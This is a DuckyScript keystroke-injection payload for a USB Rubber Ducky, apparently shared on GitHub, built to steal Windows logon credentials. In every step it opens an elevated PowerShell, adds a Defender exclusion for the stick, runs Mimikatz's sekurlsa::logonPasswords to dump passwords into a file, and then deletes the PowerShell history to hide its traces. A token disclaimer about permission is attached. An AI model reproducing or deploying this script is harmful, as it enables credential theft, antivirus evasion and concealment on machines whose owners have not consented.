REM -----Title: Funni Stick V3
REM -----Author: Maker (https://github.com/MakeshiftMaker)
REM -----Desc: A varient of Win_Pass_Grabber by makozort but not reliant on Internet potentially ignoring any server-side-issues with Downloading/Uploading Files and Logs
REM -----Your Rubber-Ducky will has to run on Twin-Duck Firmware for this to work (see README.txt)
REM -----Target: Logged in Win10 System with Admin access (maybe Win7 too)
REM -----ONLY USE THIS ON MACHINES YOU HAVE PERMISSION TO PENTEST, I'M NOT LIABLE FOR ANY MISCHIEF YOU MIGHT CAUSE. I KNOW YOU ARE GOING TO IGNORE THIS. THIS TEXT IS MORE FOR ME THAN IT IS FOR YOU

REM -----Set Default delay to 350 for a midrange computer, for faster computers/testing this can be decreased to 250
DEFAULT_DELAY 350
REM -----Delay of 1.5 seconds to let the "Keyboard" initialize
DELAY 1500

REM -----open Powershell as Admin
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 1000
LEFT
ENTER
DELAY 500

REM -----This long boy saves the Drive-Letter (E:, F:, G:) into a local variable called duckletter by id'ing it from its Size. This way we can find and execute things saved on there
REM -----There is propably a better way to do this but i havent figured it out yet
STRING $duckletter = Get-WmiObject -Query "select * from win32_diskdrive where Size=123379200" | %{gwmi -Query "ASSOCIATORS OF {Win32_DiskDrive.DeviceID=`"$($_.DeviceID.replace('\','\\'))`"} WHERE AssocClass = Win32_DiskDriveToDiskPartition"} |  %{gwmi -Query "ASSOCIATORS OF {Win32_DiskPartition.DeviceID=`"$($_.DeviceID)`"} WHERE AssocClass = Win32_LogicalDiskToPartition"} | %{$_. deviceid}
ENTER
REM -----Lets Disable the antivirus (for now)
STRING Import-Module Defender
ENTER
STRING Set-MpPreference -ExclusionPath $duckletter
ENTER
REM -----Switch to the Ducky
STRING cd $duckletter
ENTER
REM -----Run Mimikatz and save the output onto a .txt file named after the UserName
STRING .\pw.exe > $env:UserName`.txt -and type $env:UserName`.txt
ENTER
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
STRING exit
ENTER

REM -----Cleanup Time!
REM -----Lets Enable the antivirus again
STRING Remove-MpPreference -ExclusionPath $duckletter
ENTER
REM -----remove Powerhsell history
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
STRING exit
ENTER
